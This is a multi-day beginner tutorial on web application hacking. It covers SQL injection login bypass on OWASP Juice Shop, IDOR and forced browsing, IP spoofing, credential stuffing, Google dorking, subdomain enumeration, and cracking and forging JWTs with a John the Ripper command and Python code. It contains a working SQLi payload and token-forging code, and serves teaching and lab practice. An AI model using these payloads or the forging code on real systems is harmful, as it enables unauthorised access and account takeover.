Learn Ethical Web Apps Hacking in 7 days

This information is solely for educational purposes. We will not be held responsible for any misuse of the information done by the user.

PRACTICAL WEB APPS HACKING: Day 1

SQL Injection (also known as SQLi)

SQL injection is one of the most common web attack techniques.
It targets the database behind a web application: input supplied through a web page is placed into an SQL statement in a way that changes the statement's meaning, so the database executes SQL the developer never intended.



1. What is SQL injection (SQLi)?


SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure or perform a denial-of-service attack.


2. What is the impact of a successful SQL injection attack?


A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.

Recently, the databases of Domino's and LinkedIn were leaked on the dark web.

Attack Flow of SQLi:




Here, ' OR 1 = 1 --  is a malicious payload through which we can attack the website.

Workflow of the payload:

In a normal login, the SQL query looks for a row whose username and password match what was typed, and the login is approved if such a row comes back.

If the user enters ' OR 1 = 1 --   instead of the username, the SQL query becomes (one statement, shown on a single line because -- only comments out the rest of the line it appears on):

SELECT * FROM table WHERE USER = '' OR 1 = 1 -- ' AND PASSWORD = 'anything'

The payload's leading single quote (') closes the empty string that USER is compared against, OR 1 = 1 then makes the WHERE condition TRUE for every row, and the double hyphen (--) turns the remaining part of the query, including the password check, into a comment. (In MySQL the -- must be followed by a space; SQLite, which OWASP Juice Shop uses, and PostgreSQL accept it either way.)

Since every row now matches, the query returns the whole table, and typical login code takes the first row returned. The attacker is therefore logged in as whichever account sits in the first record of the table.

Generally, the first user in the database is the admin, because the admin account is created when the application is set up. If the attack succeeds, the attacker lands in the admin account and can carry out whatever it permits.

There is no guarantee that this payload will work every time, as defenses against it have already been widely deployed.

Also, OR 1 = 1 -- is the most basic payload of SQLi.

How can we protect our website from such attacks?

We can protect our website from such attacks in several ways. The primary defense is to never build SQL by concatenating user input: use prepared statements (parameterized queries) so that input is bound as data and can never become part of the SQL syntax, and give the application's database account only the privileges it needs. Keyword allow-lists or block-lists (filtering words such as OR, UNION or --) are only a secondary, defence-in-depth measure, because attackers routinely bypass them with alternative syntax and encodings. The guiding rule is "Never trust your user input". You can refer to the OWASP SQL Injection Prevention Cheat Sheet.

If we try to attack a website, would they know they are being attacked?

Usually, yes. Web servers log each request with a timestamp, source IP address, requested URL and user agent, so the attempt leaves a trace on the server, and a web application firewall or intrusion detection system may flag the payload outright. Whether anyone actually notices depends on whether those logs are monitored. Note that a properly configured server does not write submitted passwords into its logs.

Where can we try and execute this payload successfully?

We can try such payloads on Owasp Juice Shop which is a vulnerable site developed by Owasp.



The Open Web Application Security Project® (OWASP) is a nonprofit foundation that works to improve the security of software.

To try this payload on Owasp Juice Shop

1. Open Owasp Juice Shop 


2. Click on Account --> Login



3. Write the payload in the email field and anything in the password field, then click the Log In button


4. You will be logged in as the first user in Juice Shop's Users table, which is the admin account.



You can refer to PayloadsAllTheThings on GitHub for payloads for each kind of attack.

Please refer to its Authentication Bypass section for more authentication-bypass payloads.


PRACTICAL WEB APPS HACKING: Day 2

Insecure Direct Object Reference (IDOR)

Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly.
This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.
The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.

e.g. If there is a website and we are viewing the user information of our own account, the request carries our own user_id (say 01).


If the website is vulnerable to IDOR, we can change the user_id and get other users' information: if we change the user_id to 02, we get the user information of user 02's account, because the server looks the record up by the id we supplied without checking that it belongs to us.


In short, an IDOR is present when an application exposes a direct reference to an internal object (a database id, a file name) and uses the user-supplied value to fetch that object without an authorization check.

Using IDOR you will be able to access
  • User Details
  • Files (secret files on the server)

Privilege escalation happens here: through an IDOR a normal user reaches data or actions that belong to another user of the same level (horizontal escalation) or, when the referenced object belongs to an administrator, tasks that only the admin should be able to do (vertical escalation).


There are two HTTP methods through which the frontend most commonly sends parameters to the backend:
1.    GET - values/parameters are passed in the URL (query string), so they can be edited directly in the browser's address bar.
2.    POST - values are passed in the HTTP request body.
(To tamper with a POST body you need an intercepting proxy such as Burp Suite, which ships with Kali Linux: it sits between the browser and the server and lets you edit each request before it is forwarded. The same tool works for GET parameters, headers and cookies.)

CTF

CTF stands for Capture the Flag. It is a game made for hackers to practice security concepts.

You can practice some of the above concepts on Hacker101 CTF. It contains many challenges and by finding each flag we get specific points. Overall, it is a fun game to play.

Some useful websites:
Free Password Hash Cracker: https://crackstation.net/

Forced browsing using IDOR

The user talks to a CDN (Content Delivery Network) edge server, also called the front-end server, which sits in front of the application's main (origin) server.
A CDN is a geographically distributed network of caching servers. The frontend code, i.e. the HTML, CSS and JavaScript, is served from the CDN (sometimes media files as well), and to make content available quickly, user data files may be placed on the CDN too.


Suppose, the user uploads an image on his account, and the image gets uploaded to CDN as well. If it is to be stored on CDN, it will have an address so that it can be accessible later on.
Let the address be:  website_name.com/user/private/image1.jpg
If the attacker somehow learns this URL and sends a GET request for it:
GET website_name.com/user/private/image1.jpg
he receives the user's private image. Using the same method and simply changing the image name (image1 to image2, and so on), the attacker can fetch many of the user's private images.
Therefore, by brute-forcing the image names, the attacker can access all the private images of the user stored on the server.

1.    GET - fetch information from the server (Doesn't contain body).
Here GET method was used by the attacker for fetching the user's private data.
2.    POST - send data to the server (contains body).
Here POST method was used to upload the user's image on the server.

This happens because the web application never ties access to the file to the user's session: there is no check that the requesting session owns the object, so anyone who knows or guesses the path can fetch it, and the path itself is the only "secret".
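Both of this section's lookups (the user_id parameter and the private image path) as an added example, not the article's code: the direct lookup the vulnerable application performs, the ownership check that fixes it, and the attacker's image enumeration. User ids, profiles, image paths and contents are constructed, and NotFound stands in for an HTTP 404.

```python
# Added example, not the article's code: the two lookups the article describes (a
# profile fetched by user_id, a private image fetched by path) with and without
# an ownership check. Users, profiles, image paths and contents are constructed.

PROFILES = {  # constructed: object id -> record
    1: {"name": "admin", "email": "admin@example.com"},
    2: {"name": "alice", "email": "alice@example.com"},
}
IMAGES = {  # constructed: path -> owner id and file bytes
    "/user/private/image1.jpg": {"owner": 2, "data": b"<alice photo 1>"},
    "/user/private/image2.jpg": {"owner": 2, "data": b"<alice photo 2>"},
    "/user/private/image3.jpg": {"owner": 1, "data": b"<admin photo>"},
}


class NotFound(Exception):
    """Maps to HTTP 404. The fixed handlers raise it for 'not yours' as well as
    'does not exist', so an attacker cannot tell which objects exist."""


# --- vulnerable: the identifier in the request is trusted as-is ----------------

def get_profile_vulnerable(session_user_id: int, requested_user_id: int) -> dict:
    profile = PROFILES.get(requested_user_id)   # session_user_id is never consulted
    if profile is None:
        raise NotFound
    return profile


def get_image_vulnerable(session_user_id: int, path: str) -> bytes:
    entry = IMAGES.get(path)                    # knowing the path is enough
    if entry is None:
        raise NotFound
    return entry["data"]


# --- fixed: every object access is tied to the authenticated session ------------

def get_profile_fixed(session_user_id: int, requested_user_id: int) -> dict:
    # For a "my profile" endpoint the simplest fix is to ignore the client-supplied
    # id and use the session's; the comparison is kept explicit here to show it.
    if requested_user_id != session_user_id:
        raise NotFound
    profile = PROFILES.get(requested_user_id)
    if profile is None:
        raise NotFound
    return profile


def get_image_fixed(session_user_id: int, path: str) -> bytes:
    entry = IMAGES.get(path)
    if entry is None or entry["owner"] != session_user_id:
        raise NotFound
    return entry["data"]


# --- the attacker's enumeration from the article -------------------------------

def enumerate_images(session_user_id: int, fetch, count: int = 5) -> list:
    """Forced browsing: request image1..image<count> and keep the ones that return."""
    found = []
    for i in range(1, count + 1):
        path = f"/user/private/image{i}.jpg"
        try:
            fetch(session_user_id, path)
        except NotFound:
            continue
        found.append(path)
    return found


def denied(fn, *args) -> bool:
    """True if the handler refuses the request (raises NotFound)."""
    try:
        fn(*args)
    except NotFound:
        return True
    return False


if __name__ == "__main__":
    # Session belongs to user 1; the attacker guesses other ids and paths.
    print("vulnerable:", enumerate_images(1, get_image_vulnerable))
    print("fixed     :", enumerate_images(1, get_image_fixed))
```

Run as user 1, the vulnerable fetcher hands over all three images while the fixed one only returns image3, the single file that user owns. Returning the same 404 for "missing" and "not yours" is deliberate: a 403 would confirm to the attacker that image2 exists.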

PRACTICAL WEB APPS HACKING: Day 3

IP Spoofing

There are two types of addresses:
1.    Physical address - the MAC address, which is burned into the NIC (network interface card) of your device by the manufacturer and is meant to identify the device uniquely on its local network. The burned-in value itself cannot be changed, but the operating system can be told to send frames with any MAC address it likes (MAC spoofing), so it should not be trusted as proof of identity.
2.    Logical address - the IP address, which is assigned to the NIC by configuration or DHCP and can be changed at will. An IPv4 address looks like 10.11.12.13:

Total size of an IPv4 address = 4 bytes = 32 bits

A SWITCH is a networking device that connects various devices on the same network; it forwards frames to the port where it last saw the destination MAC address.


Here the attacker and the user are connected to the same network. The user's IP address is 10.11.12.13 and the attacker's IP address is 10.11.12.14. Let us say the user is browsing facebook.com: when he requests a page, the response comes back to him, and the IP address is how Facebook (and every router on the path) knows where the packets (data) have to be sent.
The attacker learns the user's IP address and changes his own from 10.11.12.14 to 10.11.12.13, the user's address.
Now two machines on the LAN claim the same IP address. The switch does not get "confused" and send the data to both: it forwards by MAC address, so the reply goes to whichever machine's MAC address the gateway currently has recorded for 10.11.12.13 in its ARP table. Each time the attacker's entry wins (and in practice an attacker forces this with ARP spoofing), the user's traffic is delivered to the attacker's computer, while the user typically sees an "IP address conflict" warning and loses connectivity.
This is known as IP spoofing: sending packets whose source address belongs to someone else. One caveat matters in practice: Facebook is served over HTTPS, so what the attacker captures is TLS-encrypted traffic rather than the user's readable Facebook data, unless he also defeats the encryption.
The connection between the web server and the user/client is not identified by the IP address alone. The user's web session is carried by a cookie or token issued at login, which is why session theft usually targets that cookie rather than the address.

Through the following website, you can know whether your data has been leaked in data breaches or not:

Have I been Pwned:  https://haveibeenpwned.com/


The Evil Twin attack (a rogue access point that imitates a legitimate Wi-Fi network so that victims connect to it) has been one of the most effective attacks against Wi-Fi.

Credential Stuffing


Suppose the user's data (e.g. email address, password, etc.) is exposed in a company's data breach, and let us say that the user uses the same password for most of his accounts.
The attacker takes the credentials from the leaked database and tries to log in to other platforms with the same email address and password. If he gets into 3 of the 5 platforms he tries, that is credential stuffing: replaying leaked credentials, usually at scale with automated tools, against services that were never breached themselves.

To protect yourself from credential stuffing, use a unique password for every account (a password manager makes this practical) and turn on MFA (Multi-Factor Authentication) or 2FA (Two-Factor Authentication), so that a leaked password alone is not enough to log in.

Threat Intelligence

Threat intelligence is a domain in cyber security that deals with such database leaks.
Suppose a cybersecurity company provides its services to a bank, and somehow the credit card details of all the bank's customers are leaked on the dark web in a data breach.
The company continuously monitors the dark web for such leaks, and as soon as it spots one it informs the bank that these credit card details are exposed. The bank can then tell the affected customers to stop using the cards and block those cards on its end as well.
This is known as threat intelligence.


Information Gathering

Ethical hacking has 5 steps, and the very first of them is information gathering (reconnaissance). It is the most important step in an attack scenario: the more thorough your information gathering, the better your attack. A common rule of thumb is that 80% of an attack is information gathering and 20% is exploitation (attacking).

Google Dorking (Advanced Google Search)

Google Dorking is a technique that uses Google's advanced search operators to locate valuable data or hard-to-find content that Google has indexed.
Google Dorking is also known as "Google hacking". (Click here to know more)

For dorking we need a live target, which we can get from the Bug Bounty section of the HackerOne platform, where each program lists the domains it allows testing against.

inurl:uber.com => results whose URL contains uber.com
site:uber.com => results only from uber.com and its subdomains
site:.in => results only from .in sites
inurl:bigbasket site:.in => .in sites with bigbasket somewhere in their URL
site: can be narrowed to a whole TLD (Top Level Domain) such as .in, .com or .co.in, or to a single domain.
intitle:admin, intitle:login, intitle:college => searches the page title for the given word and displays the results accordingly
intitle:"admin login" => pages whose title contains "admin login", i.e. the admin login pages of websites listed on Google
filetype:pdf => results that are PDF files
filetype:docx => results that are DOCX files
(Write operators without a space after the colon: filetype:pdf, not filetype: pdf.)
 
 
 
Whois lookup tells us the fundamental registration details of a domain: registrar, creation and expiry dates, name servers and, unless privacy protection is enabled, the registrant's contact details.

e.g. If we look up Uber's domain


we get all the important details of uber.com


You will also get to know the expiry date of the domain, and if the owner lets it lapse you can buy the domain when it expires.
This happened with Google this year. Click here to know more.

Sub-domain

A subdomain is an additional part to your main domain name. Subdomains are created to organize and navigate to different sections of your website. You can create multiple subdomains or child domains on your main domain.

Generally, we do not find many vulnerabilities on the main site; we find more on the sub-domains, which often host older, forgotten or third-party services that receive less attention.

We can enumerate sub-domains with Sublist3r on Kali Linux (e.g. sublist3r -d uber.com) or with the VirusTotal website.

Sublist3r:

VirusTotal:



Out of these sub-domains, only some are reachable by us. To check which ones, copy the sub-domains, go to httpstatus.io, paste them all into the box and click Check status.


The sub-domains that show a 200 response in the status code column are accessible to any user over the internet. Redirects (301/302) and 403 Forbidden responses also mean a live host worth a closer look, while names that do not resolve or point at an unclaimed third-party service deserve attention for the reason below.


Sometimes the sub-domains are used for hosting third-party services as well (a CNAME record pointing at a hosting, CDN or SaaS provider).
Sub-domain takeover is possible when such a record is left in DNS after the organization stops using the service: an attacker registers the same name with the provider and can then serve his own content under the organization's sub-domain.

PRACTICAL WEB APPS HACKING: Day 4

CTF for beginners

You can practice some of the above concepts on picoCTF. It contains many challenges for beginners. Overall, it is a fun game to play.

Some useful websites:
Free Password Hash Cracker: https://crackstation.net/
Free MD5 hash generator (MD5 is a hash function, not encryption; it cannot be "decrypted", only looked up or brute-forced): https://www.md5online.org/md5-encrypt.html

Practice challenges on picoCTF.

Robots.txt

A robots.txt file tells search engine crawlers which URLs they may fetch on your site. It is used mainly to avoid overloading the site with requests; it is not a mechanism for keeping a web page out of Google. To keep a page out of Google, block indexing with noindex or password-protect the page.
For a tester the file is interesting for the opposite reason: it is public, and its Disallow entries are a ready-made list of paths the site owner would rather not advertise (admin panels, backups, staging areas), so it is one of the first files to read during information gathering. Never rely on robots.txt for access control.
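An added example, not from the original article, of how a tester turns a robots.txt into a list of paths to look at: a small parser for the file's record format (groups of User-agent lines followed by Allow/Disallow lines). SAMPLE_ROBOTS is a constructed file, not one fetched from any real site.

```python
# Added example, not from the original article: a small parser that pulls the
# Disallow paths out of a robots.txt body, grouped by user-agent, which is how a
# tester turns the file into a list of paths to look at. SAMPLE_ROBOTS is constructed.

SAMPLE_ROBOTS = """\
# constructed sample robots.txt
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/

User-agent: Googlebot
User-agent: Bingbot
Disallow: /staging/
Disallow:          # an empty Disallow disallows nothing

Sitemap: https://example.com/sitemap.xml
"""


def parse_robots(text: str) -> dict:
    """Return {user_agent: [disallowed paths]} following the record grouping of the
    robots.txt format: consecutive User-agent lines share the rules that follow
    them, and a User-agent line after a rule line starts a new record."""
    rules = {}
    agents = []
    seen_rule = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and whitespace
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if seen_rule:                            # previous record is complete
                agents, seen_rule = [], False
            agents.append(value)
            rules.setdefault(value, [])
        elif field in ("disallow", "allow"):
            seen_rule = True
            if field == "disallow" and value:        # empty value disallows nothing
                for agent in agents:
                    rules[agent].append(value)
        # Sitemap and unknown fields belong to no record and are ignored here
    return rules


def disallowed_paths(text: str) -> list:
    """Flat, de-duplicated, sorted list of every path any agent is told to avoid:
    the paths a tester would queue up to request by hand."""
    return sorted({p for paths in parse_robots(text).values() for p in paths})


if __name__ == "__main__":
    for agent, paths in parse_robots(SAMPLE_ROBOTS).items():
        print(f"{agent}: {paths}")
    print("paths to check:", disallowed_paths(SAMPLE_ROBOTS))
```

Feed it the body of a real robots.txt (fetched with curl or a browser) in place of SAMPLE_ROBOTS; the flat list from disallowed_paths is what you would then request directly, since nothing stops a non-crawler from visiting them.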

Reverse Engineering

Reverse engineering means working out how software works without having its source code, usually by disassembling or decompiling the compiled binary and studying the result, for example to find a vulnerability, recover a file format or protocol, or bypass a licence check. Note that taking the source code of an open-source program such as Mozilla Firefox, changing the dark theme to a light one and recompiling it is ordinary software modification, not reverse engineering, since the source is already public. In CTFs, the reversing category hands you a binary with no source and asks you to work out what it does, typically to recover the flag it checks for.

What is .htaccess and what is it used for?

htaccess file is a powerful website file that controls the high-level configuration of your website. On servers that run Apache (a web server software), the .htaccess file allows you to make changes to your website's configuration without having to edit server configuration files.

What is CyberChef?

CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that can make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.

What is HexEd.it

HexEd.it is a free hex editor for Windows, MacOS, Linux, and all other modern operating systems. A hex editor (or binary file editor or byte editor) is a computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name 'hex' comes from 'hexadecimal', a standard numerical format for representing binary data. Analyze hexadecimal binary dumps and files, read, manipulate, write, import, and export byte as well as bit data in this web app.

Number Conversion Website

Binary / Decimal / HexaDecimal to Binary / Decimal / HexaDecimal Converter: https://www.rapidtables.com/convert/number/hex-to-decimal.html

PRACTICAL WEB APPS HACKING: Day 5

Shoulder Surfing

In computer security, shoulder surfing is a type of social engineering technique used to obtain information such as personal identification numbers, passwords and other confidential data by looking over the victim's shoulder (for example, spying on the user of a cash-dispensing machine or another electronic device).

JWT (JSON Web Token)

Let us understand JSON Web Token (JWT) by a real-life example:

Suppose a User's laptop/pc gets crashed due to some software/hardware problem, and the user goes to a computer repair shop. The employee tells the user that it will take around 2 days for repairing the laptop/pc to be working perfectly fine. For assurance, the computer shop's employee gave the user a receipt that had some of the user details written on it (e.g. name, contact, laptop/pc model number, the issue with laptop/pc, etc). 
A guy was standing near the user and was shoulder surfing and he got all the details of the user. Now, he duplicates the receipt with the user's details filled in it and he can claim the user's laptop as he has duplicated the receipt.
To prevent such malicious activities, the employee takes the signature on the receipt and gives the receipt to the user, and the employee keeps the copy of the receipt with him. When the user comes to take his laptop/pc, he verifies his signature and then handovers the laptop/pc to him after the signature is verified. 
In this case, the Signature played a major role as it was used to verify the authenticity of the user/customer for security purposes. 

Whenever we (as a client) log in to a social media website, we do not have to log in again every time we load or visit a page. This is done by cookies, which are stored in the browser. When we log in for the first time, the server sends us a cookie, and the browser sends it back with every later request. The cookie does not hold our password; it holds either a session identifier (an opaque random value that the server maps to our login) or a signed token such as a JWT that carries our identity, and it travels over HTTPS so that it cannot be read on the network.
Relating this to the scenario above, the receipt is the cookie, and the JWT's signature plays the role of the signature on the receipt: it lets the server verify that the token it is handed is the one it issued and has not been altered. (The signature proves integrity, not secrecy; anyone holding the token can read its contents.)


JWT is an open standard (RFC 7519). The jwt.io debugger commonly used to inspect tokens is maintained by Auth0.

A JWT is divided into 3 parts separated by a period (.):
  • The first part is the header (algorithm and token type).
  • The second part is the payload (data, called claims).
  • The third part is the signature.


  • Header and payload are base64url-encoded JSON. They are encoded, not encrypted: anyone holding the token can decode and read them.
  • The header contains metadata about the token, chiefly alg (the signing algorithm, e.g. HS256) and typ (JWT).
  • The payload carries the claims, e.g. user_id, email, expiry (exp), role, etc.
  • The signature is what gives the token its security. With HS256 it is HMAC-SHA256 computed over header.payload with a secret key known only to the server; HMAC is a message authentication code, not an encryption algorithm. Other algorithms such as RS256 and ES256 sign with a private key and verify with the matching public key.

Brute forcing the key of a JWT signature to get access:

If the server signs with HS256 and chose a weak secret, the signature can be attacked offline: the attacker already holds the header, payload and signature, so each candidate secret can be tried locally until one reproduces the signature, with no requests to the server and nothing for it to log. Once the secret is known, the attacker can forge a token with any claims he likes (for example changing role to admin) and the server will accept it.

Tools: John the Ripper (a Kali Linux tool used for cracking hashes, passwords, etc.)

Wordlist: RockYou (it contains common passwords, usernames, words used in web applications, etc.; on Kali it is at /usr/share/wordlists/rockyou.txt, gzipped on a fresh install)

Format: the token's alg is HS256; John's name for it is HMAC-SHA256. Save the whole token in a file and run:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256 jwt.txt
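The attack this section runs with John the Ripper, as an added example that is neither the article's code nor John's: tokens issued and verified with HS256 in plain Python, an offline dictionary attack against the secret, and a forged admin token once the secret is found. The secret (secret123), the claims and the six-word WORDLIST standing in for rockyou are all constructed for the demo.

```python
# Added example, not from the original article: HS256 tokens issued, verified,
# attacked with an offline dictionary attack on the secret (what the article does
# with John the Ripper and rockyou) and then forged with the recovered secret.
# The secret, the claims and WORDLIST are constructed for the demo.
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    """JWT uses base64url without '=' padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """header.payload.signature, where signature = HMAC-SHA256(secret, header.payload)."""
    parts = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
             for obj in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes):
    """Return the claims if the signature is valid for this secret, else None.
    Pinning alg to HS256 stops a token claiming alg:none or RS256 from being accepted."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):   # constant-time compare
        return None
    return json.loads(b64url_decode(p))


def crack_secret(token: str, wordlist):
    """Offline dictionary attack: the attacker holds header, payload and signature,
    so every candidate secret is tested locally, with no traffic to the server."""
    for word in wordlist:
        if verify_hs256(token, word.encode()) is not None:
            return word
    return None


def forge(token: str, secret: bytes, **new_claims) -> str:
    """Re-sign the token with modified claims once the secret is known."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    payload.update(new_claims)
    return sign_hs256(header, payload, secret)


# Constructed stand-in for rockyou.txt; the real list has about 14 million entries.
WORDLIST = ["123456", "password", "letmein", "qwerty", "secret123", "welcome1"]

if __name__ == "__main__":
    server_secret = b"secret123"            # constructed weak secret
    token = sign_hs256({"alg": "HS256", "typ": "JWT"},
                       {"user_id": 7, "role": "user"}, server_secret)
    found = crack_secret(token, WORDLIST)
    print("recovered secret:", found)
    admin_token = forge(token, found.encode(), role="admin")
    print("forged token accepted as:", verify_hs256(admin_token, server_secret))
```

Two details in verify_hs256 are the defensive side of the same lesson: the server must pin the algorithm it expects rather than trust the token's alg header, and compare signatures in constant time. Neither helps if the secret is in a wordlist, which is why an HS256 secret should be a long random value, not a password.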

PRACTICAL WEB APPS HACKING: Day 6

Bug Bounty

Using your knowledge of cybersecurity to find and report unique security vulnerabilities to organizations; in return, you get rewarded.

Public IP vs Private IP

Let us say, we stay in a hotel and the hotel rooms have an intercom present which is connected to the reception. The hotel could have provided a different mobile connection for each and every room but instead of doing it that way, they choose intercoms in every room as many people will be coming and staying in a hotel and if someone has malicious deeds and carries out his malicious deeds, the Hotel would be held responsible for it. And secondarily, it would be too costly to provide a different mobile connection to each and every room. Therefore, to minimize the cost and add security and monitoring to the calls, hotels have intercoms installed in their rooms.
Now, If we wanna make a call to someone, we will have to call the reception and they will connect our call to the specified person. The person will be able to see the reception's phone number.

Similarly, if you live in a college hostel, each room has a separate LAN port so that the student can have an internet connection, and all the rooms are connected to the building's main router (a router is a device that connects different networks). To reach Facebook we connect to the LAN port or Wi-Fi, which leads to the router, which in turn forwards our traffic across the internet to Facebook's web server (the same holds for a home connection from an ISP). The router has a public IP address and each LAN port gets a private IP address, which is how the router knows which room's device requested the data. The router's key job here is network address translation (NAT): it rewrites the private source IP to its public IP on the way out and maps each reply back to the right private address on the way in, because only public IPs are routable on the internet.
(The ISP provides us with the public IP address through which we can browse the internet.)



Domain Name System (DNS)

It is basically the phonebook of the internet. The Domain Name System is a hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating

MAC Address

A MAC address is a physical address. We can find it on the NIC card of our device. The MAC address is like the DNA of your device: it identifies the device uniquely on its local network. The value burned into the NIC cannot be changed, but the operating system can override it in software (MAC spoofing). We can view our MAC address through the command line.

Commands for Windows:
  • ipconfig /all
  • getmac

Commands for Linux:
  • ip link
  • ifconfig (older; on many current distributions it requires the net-tools package)


It is a 6 bytes (48 bits) address.

IPv4



IP addresses were not introduced to simplify MAC addresses; they solve a different problem. A MAC address only identifies a device on its own local network, while an IP address is a logical address (which can be changed) that can be routed between networks, which is what lets a device surf the internet.
It is a 4 bytes (32 bits) address.

IPv6

IPv4 was the original address format, but as the number of connected devices grew, its 32-bit address space (about 4.3 billion addresses) ran out, and hence IPv6 was introduced with 128-bit (16-byte) addresses.

You can get your IP address by visiting whatismyipaddress.com

PRACTICAL WEB APPS HACKING: Day 7

Vulnerability Assessment Penetration Test

The basic format of the VAPT report is mentioned below. You can refer to more reports on our blog in the PicoCTF Challenges category.

Title: e.g. SQL injection in the login page.

Description of the Vulnerability: The login form builds its SQL query from unsanitized input, so the payload below logs the attacker in as the admin account.

Summary: summary of the bug.

Steps to reproduce: step-by-step instructions (URL, field, payload, expected result vs observed result) so that the reader can repeat the exploit.

Payload: ' OR 1=1 --

Impact:   
                1. Access to the admin account.
                2. Complete takeover of the database.

Mitigation (optional): how to fix the bug.
                1. Use prepared statements (parameterized queries) instead of building SQL from user input.
                2. Don't trust user input; validate it on the server side.

POC (Proof of concept): provide screenshots/videos of the vulnerability.


You can solve more challenges on Pico CTF or hacker101 and prepare their VAPT report.



Some important Full-Forms:
SQL: Structured Query Language
API: Application Programming Interface
CTF: Capture The Flag
CDN: Content Delivery Network
TLD: Top Level Domain
ISP: Internet Service Provider
DNS: Domain Name System


All the flowcharts are designed by Omkar Ravindra Yadav.


If you have any doubts, please let me know...
